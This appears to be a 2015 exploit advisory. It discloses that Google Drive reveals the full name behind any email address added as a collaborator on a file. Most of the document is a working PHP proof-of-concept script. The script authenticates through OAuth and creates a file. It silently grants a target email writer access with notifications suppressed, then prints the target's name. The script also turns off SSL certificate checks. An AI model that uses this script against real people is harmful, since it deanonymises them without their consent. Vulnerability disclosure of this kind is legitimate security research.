exploit title: full name disclosure information leak in google drive
software link: https://drive.google.com/drive/#my-drive
author: kevin mcsheehan
website: http://mcsheehan.com
email: kevin@mcsheehan.com
date: 01/20/15
source: http://mcsheehan.com/?p=15
description: google drive leaks the full name of a target email
address when said email address is associated with an uploaded file.
the full name is displayed whether or not the target has made that
information publicly accessible by creating a google plus account. in
some cases, full name disclosure isn't limited to @gmail/@google and
the full names of @hotmail, @yahoo, etc. users may also be revealed. a
live poc example can be used at the aforementioned source url, or
hosted yourself with the following proof of concept php code which
utilizes
https://github.com/google/google-api-php-client/archive/master.zip and
google drive api:
<?php
//discovered by kevin@mcsheehan.com / http://mcsheehan.com
//instructions: using google developers console, generate api
credentials after enabling drive api on a new project and then edit
this file with said credentials (i.e. clientid, clientsecret,
redirecturi) - this also requires google-api-php-client which can be
downloaded here:
https://github.com/google/google-api-php-client/archive/master.zip
$targetEmail = 'target@gmail.com';
require_once "google-api-php-client/src/Google/Client.php";
require_once "google-api-php-client/src/Google/Service/Drive.php";
require_once "google-api-php-client/src/Google/Auth/AssertionCredentials.php";
$cScope = 'https://www.googleapis.com/auth/drive';
$cClientID = '[clientid]';
$cClientSecret = '[clientsecret]';
$cRedirectURI = '[redirecturi]'; //redirect to this file
$cAuthCode = '';
if(isset( $_GET['code'])) {
$cAuthCode = $_GET['code'];
}
if (!($cAuthCode) == "null") {
$rsParams = array(
'scope' => $cScope,
'state' => 'security_token',
'redirect_uri' => $cRedirectURI,
'response_type' => 'code',
'client_id' => $cClientID,
'access_type' => 'offline',
'approval_prompt' => 'force'
);
$cOauthURL = 'https://accounts.google.com/o/oauth2/auth?' .
http_build_query($rsParams);
header('Location: ' . $cOauthURL);
exit();
}
elseif (empty($cRefreshToken)) {
$authURL = "https://www.googleapis.com/oauth2/v3/token?code=" .
$cAuthCode . "&client_id=" . $cClientID . "&client_secret=" .
$cClientSecret . "&redirect_uri=" . $cRedirectURI .
"&grant_type=authorization_code";
$ch = curl_init();
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_URL, $authURL);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, "");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$output = curl_exec($ch);
curl_close($ch);
$oToken = json_decode($output);
$accessToken = $oToken->access_token;
$refreshToken = $oToken->refresh_token;
}
$createURL = "https://www.googleapis.com/drive/v2/files";
$ch = curl_init();
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'Content-Type: application/json',
"Authorization: Bearer " . $accessToken
));
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'POST');
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_URL, $createURL);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, "{\"title\": \"revealyourself1\"}");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$output = curl_exec($ch);
curl_close($ch);
$oToken = json_decode($output);
$fileID = $oToken->id;
$compileJSON = array("role" => "writer","type" => "user","value"
=> $targetEmail,"emailAddress" => $targetEmail);
$jsonPostData = json_encode($compileJSON);
$addUser = "https://www.googleapis.com/drive/v2/files/" . $fileID
.. "/permissions?sendNotificationEmails=false";
$ch = curl_init();
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'Content-Type: application/json',
"Authorization: Bearer " . $accessToken
));
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'POST');
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_URL, $addUser);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $jsonPostData);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$output = curl_exec($ch);
curl_close($ch);
if (strpos($output,'error') !== false) {
echo 'error feedback from google:<br><br>' . $output;
} else {
$oToken = json_decode($output);
$fullName = $oToken->name;
echo $targetEmail . ' is ' . $fullName;
}
?>
